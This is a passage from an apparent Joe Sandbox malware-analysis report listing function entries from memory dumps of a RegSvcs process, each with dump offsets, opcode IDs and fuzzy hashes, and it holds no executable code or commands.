                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a8cda9a998d5253b294a98d2cb2e08c2ca5b29d34c2a5393e4a3ff340d56e88
                                              • Instruction ID: abc56cdcac8e06a6fb98dd2bee8aefec9ec424c34c97486b6bbfac24ba60c552
                                              • Opcode Fuzzy Hash: 1a8cda9a998d5253b294a98d2cb2e08c2ca5b29d34c2a5393e4a3ff340d56e88
                                              • Instruction Fuzzy Hash: F1E04F763001149BC7149A5EE404D9ABBAEDBD87717058037FA08CB320CA71DC52C6A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B956A Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c062f63d70ea911f50888222c1d3c5cb9c65ade4e20b9363739fb250daff1f61
                                              • Instruction ID: 916363ce80da39618cfc97a4d37c6cb97face6f103e4eb01476da15d1b9e3576
                                              • Opcode Fuzzy Hash: c062f63d70ea911f50888222c1d3c5cb9c65ade4e20b9363739fb250daff1f61
                                              • Instruction Fuzzy Hash: B5E0D872211217C7D2146B5CF8C44987716EBD4B20310913AE6058A210CFB8DD8687C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2EA1 Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 685656a357eb3efbb3c579a06ffe086750aa853489f149ff1328405c44c031ee
                                              • Instruction ID: ab559a6cb9663af98ab1b1cd138571fa4c38afe508f2081e1429b09b29b3c0e6
                                              • Opcode Fuzzy Hash: 685656a357eb3efbb3c579a06ffe086750aa853489f149ff1328405c44c031ee
                                              • Instruction Fuzzy Hash: 1BE08C6082E3D68FD3331BBA14A80EA3FF49C4B34474D20DBE9D48F563C495685AC3A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3B8F Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f93a6427ad57cf508a396b119b15509c153507ab404eee9a4c1e6b4e95b73c4
                                              • Instruction ID: e84e4fdfbb34c845f047d0f59b213ffcaba96083f0e6c4d8f1b12062ce5b09b5
                                              • Opcode Fuzzy Hash: 2f93a6427ad57cf508a396b119b15509c153507ab404eee9a4c1e6b4e95b73c4
                                              • Instruction Fuzzy Hash: C2E02671708384DFD706D774C4295183FB0EF4674070888B6E205CF3A2DA258C00C362
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0980 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b765c14c418c8cddfb1f17bfc0b24a9ebf46fba1987298d25d492ea1b52ce9af
                                              • Instruction ID: 123d90780e47ddb757215a1da9775e7dda89b06b8d9dfe3a37ecf1f47372ffcf
                                              • Opcode Fuzzy Hash: b765c14c418c8cddfb1f17bfc0b24a9ebf46fba1987298d25d492ea1b52ce9af
                                              • Instruction Fuzzy Hash: E7E09270506389FFCB01DBA8D95195CBFF4DE42204B2044DAD448D7212EB305E109B51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073504D8 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d6aacf462136aded6b44ab0be2956ad3e47a48e4446242c5c21bd6e75028c6c
                                              • Instruction ID: 026af55f00ece7c3c7194f05df757af2c057d8bb7bd36e668c3f65ef03af39a0
                                              • Opcode Fuzzy Hash: 5d6aacf462136aded6b44ab0be2956ad3e47a48e4446242c5c21bd6e75028c6c
                                              • Instruction Fuzzy Hash: 1CE0DF302093828FC7169B38E82089B7FE6CF82220309489FD4C9CB553CA949845C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C9418 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f79849d736ffc6085b705813a5afcfc7f137758fa0e1264fed87b74d70a7216
                                              • Instruction ID: 50c6df6e3dd30644d0638cad7c4f7f57fbaade612701041a5a12b46c613c0651
                                              • Opcode Fuzzy Hash: 9f79849d736ffc6085b705813a5afcfc7f137758fa0e1264fed87b74d70a7216
                                              • Instruction Fuzzy Hash: 9CE04FB040534AEFE312D624D880715FBA8EB45205F1586E9D448CB212D335DCA4C793
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3B38 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6825cdc5d9cf762e96c6711dd2da2bdd1b2b6854e1559621592b7e3cfc3be6d8
                                              • Instruction ID: 55262464e94db8cf33ed089ece1584cd4e67886a1a35999cfefd7e6abaed1d54
                                              • Opcode Fuzzy Hash: 6825cdc5d9cf762e96c6711dd2da2bdd1b2b6854e1559621592b7e3cfc3be6d8
                                              • Instruction Fuzzy Hash: BCE026302493808FC3019BB4D4649B43F79DF0A22030A00E6E684CF363CB22DC01C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073556FB Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 30a8c3254ae70897c13ae693da331b03867f278c0b9d07c66bc401fc4695f9b9
                                              • Instruction ID: 9172db3c66f40f1d5bfffdf5d31db174aa20607e32286857f011ff51c3e5d9ba
                                              • Opcode Fuzzy Hash: 30a8c3254ae70897c13ae693da331b03867f278c0b9d07c66bc401fc4695f9b9
                                              • Instruction Fuzzy Hash: EDE0ED70A50249CFEB14DF95C991E9EBB72AF85204F244415C819AB255DB74AF16CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735F44F Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd25511fab688f623c6c84fbb9938f88ba6cf1ec59f11f2a47e45b0654f2dc57
                                              • Instruction ID: 3991b06d692885813b11320f4fe40bb84b39b80f1e50dc1a19b6c93832e5e748
                                              • Opcode Fuzzy Hash: bd25511fab688f623c6c84fbb9938f88ba6cf1ec59f11f2a47e45b0654f2dc57
                                              • Instruction Fuzzy Hash: 7AD05EF6704218AFBF1A9A15E895CBEBF2EF7C01A57104017F80A85644DB224D11AA52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7EC0 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81493642074a874c28d3fde3b7fc365b01d4d66eca205c391357f335f88e7b60
                                              • Instruction ID: 7f797b19328fd65028695bd6be044c71b449ebeccd1bc4335268256a55134d9b
                                              • Opcode Fuzzy Hash: 81493642074a874c28d3fde3b7fc365b01d4d66eca205c391357f335f88e7b60
                                              • Instruction Fuzzy Hash: D6E0B670E0520CEFCB44EFA8E4459ADBFF5EB88300F0081AAD919E7350EA745A44CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E5DF Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdca858019cd22ec2899adafb1c10d971d556d673a262010879acb571073e236
                                              • Instruction ID: 78ff7b72ef4e4fe7035610af1b919ad86732be5dd0b039173416a7b32c67b7e1
                                              • Opcode Fuzzy Hash: fdca858019cd22ec2899adafb1c10d971d556d673a262010879acb571073e236
                                              • Instruction Fuzzy Hash: 30D022782086718FC7039B18E4C0884BFE84F8F2003291183DA04C3202CB384C0AC792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3EA0 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e8c399ec84d3136a15d5486b831cb3e33abc23998e8ce35395ae8b2b0a685b6
                                              • Instruction ID: 77492125826eaa63bde776fdab2d8795f772f9119dacb79ec6dd964be2ea8e95
                                              • Opcode Fuzzy Hash: 2e8c399ec84d3136a15d5486b831cb3e33abc23998e8ce35395ae8b2b0a685b6
                                              • Instruction Fuzzy Hash: A3D0A7363001147B8B051A49A4058AE3B5EE7CC731B008026F90583301CE758C1297D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073504E8 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 924162857c010d83e8508a26228b4b01fe9e22e082ad040ba677840773239598
                                              • Instruction ID: 61b0a641b8cd3a14ffa2d68d51504578ae1d20974516e7b8b0b16c50e2c53ae1
                                              • Opcode Fuzzy Hash: 924162857c010d83e8508a26228b4b01fe9e22e082ad040ba677840773239598
                                              • Instruction Fuzzy Hash: 5ED0A771200717C7D618A73AE84089B7BDDDFC4360704982DDA1E87610DFA4F80187C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3B48 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9656803369b0a64aa0afd8fdd3023581177b5a3ccb6e32f112421556c5ba6a61
                                              • Instruction ID: ce913ef6b0c283c78713b4fc82f8d5d8901cec89b835253cd9e52a1a6fa1f8b7
                                              • Opcode Fuzzy Hash: 9656803369b0a64aa0afd8fdd3023581177b5a3ccb6e32f112421556c5ba6a61
                                              • Instruction Fuzzy Hash: 03D0A935350224DFC304AB28E42AD6973A9EF48731B0580A9E90A8B363CE72EC008BC0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0990 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16902d2fb3538f4b87faa1e3b41eb50a1b4e4fb24cb84bbb97d37a4e77dd30c2
                                              • Instruction ID: 13ac071b8a1e61b90ed4f2ebadd9a643d12b22834e3044d9bfff22da91a51ef7
                                              • Opcode Fuzzy Hash: 16902d2fb3538f4b87faa1e3b41eb50a1b4e4fb24cb84bbb97d37a4e77dd30c2
                                              • Instruction Fuzzy Hash: 90D01270A0120DFFCB44DFA8E90195DB7F9EB45304B20459C9408D3201DB715E109B40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E5BF Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 77e5e97f3cf9c2b0d4c0fce4e96a02a0150c8bb1d6a5412376d20e9e135015e5
                                              • Instruction ID: f388f5e54a198d6f4a1ba9b9fcc3dece13ca66a1f870d5916751d0ccf1a37784
                                              • Opcode Fuzzy Hash: 77e5e97f3cf9c2b0d4c0fce4e96a02a0150c8bb1d6a5412376d20e9e135015e5
                                              • Instruction Fuzzy Hash: 6BD09E710492859FC3069B28D8D59857FF8DF4A62476500C6D144CB962C725E895CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E5A1 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee078912c9d0cf1afbaef693b9f95aad577f270aec9e81e5d35feecee86ae440
                                              • Instruction ID: 897f19d290532126d908cd9302b08b057a65d1faee1d7ea62f5d4f98d975fec3
                                              • Opcode Fuzzy Hash: ee078912c9d0cf1afbaef693b9f95aad577f270aec9e81e5d35feecee86ae440
                                              • Instruction Fuzzy Hash: 97D0C9750183889FC742DB78D4C8884BBF8AE0A61432640D2E548CB223D721A854CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B8DA3 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f67b4af316f14dea633e1af250ff314612443c41da3bb3060f1ad471f69aebb
                                              • Instruction ID: d51de614767fcd1f1e934286fd5e989d2e7724ab8462652ff77adcccb72108d2
                                              • Opcode Fuzzy Hash: 9f67b4af316f14dea633e1af250ff314612443c41da3bb3060f1ad471f69aebb
                                              • Instruction Fuzzy Hash: ADD0223000E3C76FC7032334BC6A4A17F2CDD4300030502CAE4888A013E64C1955C3E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7E8B Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d566a201a507cf60df5bf9456e4f6c0251cce1c7488235e71dad505d1376b47
                                              • Instruction ID: 67ddceb23e9250566ca6d64ac97e42eaad4916e479d73c0724c8967f02858694
                                              • Opcode Fuzzy Hash: 5d566a201a507cf60df5bf9456e4f6c0251cce1c7488235e71dad505d1376b47
                                              • Instruction Fuzzy Hash: 47D0127041F7C85FC7638B7898104577F788B0B250B1509EBE998CF723D5654A24C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B18D4 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd721fd389880657f515fea265e840ee5791f986f4c12a850b30d95453de18ba
                                              • Instruction ID: 81fd1e22248f39cbd2b46ea8932eb3554a6b8674aee79bd6a8f3cb14017681cc
                                              • Opcode Fuzzy Hash: bd721fd389880657f515fea265e840ee5791f986f4c12a850b30d95453de18ba
                                              • Instruction Fuzzy Hash: F3D09276B10214CFCB58DB68E85899CBBB0EB88225B0144AAE61ADB221DB7199518F10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B8D7B Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 191276fa3468393072b884e57049aabb9ac53399a03b5c8ee484176289a6eac1
                                              • Instruction ID: 63ecb39ace13708aa6db1fef454955ede56754e5392cd85a8fd5fef70ecd85ac
                                              • Opcode Fuzzy Hash: 191276fa3468393072b884e57049aabb9ac53399a03b5c8ee484176289a6eac1
                                              • Instruction Fuzzy Hash: E8D0121420B3D20FDB03533058655967F25DB83204B4404CE94C48F6C3C2148D12D3F3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B95A3 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7a46b81f6268cd8b961b0a285547b8ba63d761399d8f61600d79aa7b573b222
                                              • Instruction ID: 04dc03144026453b33d32e26da1c53e07f8658fe8fb2745f2277b5b681439d4c
                                              • Opcode Fuzzy Hash: d7a46b81f6268cd8b961b0a285547b8ba63d761399d8f61600d79aa7b573b222
                                              • Instruction Fuzzy Hash: 91C0121520A3800BFB035230A8107832F628B83700F4640C6D0888FAE2CA1E8E01C3F2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BDE80 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 66a2bbdb54788f5206d30a1061b38e75848fdf16a137eaaf297930ab044a3db2
                                              • Instruction ID: 26097a9549a004fc2b4eaa4fe32dd99ebb84deae54ffdf037c1376669a9919d4
                                              • Opcode Fuzzy Hash: 66a2bbdb54788f5206d30a1061b38e75848fdf16a137eaaf297930ab044a3db2
                                              • Instruction Fuzzy Hash: 74D0C9B00593C46AC79356748804A867FB10B43301F16158BD1C0C805380550486E326
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C095F Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40ca6eda42b716ba4805d29a208f18fc9632adb439cb619f04e31a6e25a997ff
                                              • Instruction ID: 94cb57e4f5b04db84b20bd8f8801ebab312935ef7c66357a9c8d20f4b1b1e06d
                                              • Opcode Fuzzy Hash: 40ca6eda42b716ba4805d29a208f18fc9632adb439cb619f04e31a6e25a997ff
                                              • Instruction Fuzzy Hash: 3ED012204492C1AFEB02AB30D9959457FF47F43308B2940CAC0448B093C7555427C711
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0D3F Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eca4c08967435a59cb7966a1a3756e23de38cc95ef7a8324c4873abd295c7b2b
                                              • Instruction ID: 2cb89c6d541759991c98d40a22b36b206b2d0c62aecb2a85bf23aa525e7bcad7
                                              • Opcode Fuzzy Hash: eca4c08967435a59cb7966a1a3756e23de38cc95ef7a8324c4873abd295c7b2b
                                              • Instruction Fuzzy Hash: 31C09B5654D3D53FD74386D49D92CD57F249C0311036E01CBD444D7553D15496F4C753
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B95D3 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c69007c6e2638fb709a51632a1636bff0c19b579b94badcbe1625ec0e3d0931d
                                              • Instruction ID: 75d3d806d360ee3324f3be9c2919fe00ce4bf108d3007e477e61f59ca2792f0b
                                              • Opcode Fuzzy Hash: c69007c6e2638fb709a51632a1636bff0c19b579b94badcbe1625ec0e3d0931d
                                              • Instruction Fuzzy Hash: 09C02B3140434FDBD60233B0F81C8D47F3CDB41108B001400B40C01016BE9C2C534AC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7E98 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6d02c4a59c8f2e2e6de49e95e7082314d472cfb895bf9c3e5327ea0ed633fb6
                                              • Instruction ID: 5cab900b2993ccfb56e921abebeb347b2e3b017639e81257c93b6a0e1b219aad
                                              • Opcode Fuzzy Hash: e6d02c4a59c8f2e2e6de49e95e7082314d472cfb895bf9c3e5327ea0ed633fb6
                                              • Instruction Fuzzy Hash: 78B0927090930CAF8620DA99980185ABBACDA1A210B4001EAEA0887320D972A9109AE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B9B00 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 898618e75abe1d889c7dc294ee255b8b40b70847e19694ec86a685c58898cd8a
                                              • Instruction ID: e438816b717ce14685c8c9097cbee308d70e46f52c71f72893f9ee352e86ed8e
                                              • Opcode Fuzzy Hash: 898618e75abe1d889c7dc294ee255b8b40b70847e19694ec86a685c58898cd8a
                                              • Instruction Fuzzy Hash: 6AC08CF8600300AFE348AB248C48A27BEE3EBD8321F02C818A20086228CE748851CA51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1123 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef9be3153cbc05ee4f5c1b6e72d4db32a2c35bd80444850fb280f8c5ec3ec3bd
                                              • Instruction ID: d2c6490dc7eb56cd8a56b84fceda8cf8ee30bd2a3711f2ac33ae1c49e73ba858
                                              • Opcode Fuzzy Hash: ef9be3153cbc05ee4f5c1b6e72d4db32a2c35bd80444850fb280f8c5ec3ec3bd
                                              • Instruction Fuzzy Hash: 81B09237A00019868A00D688E4404DCFB30DA94332F004033C200620408621196A8764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E5B0 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                              • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                              • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                              • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E5D0 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9daf118bfbcc3bf9e3a36b33321736fd5490af0d73cb682b29b312aa5d5cce5
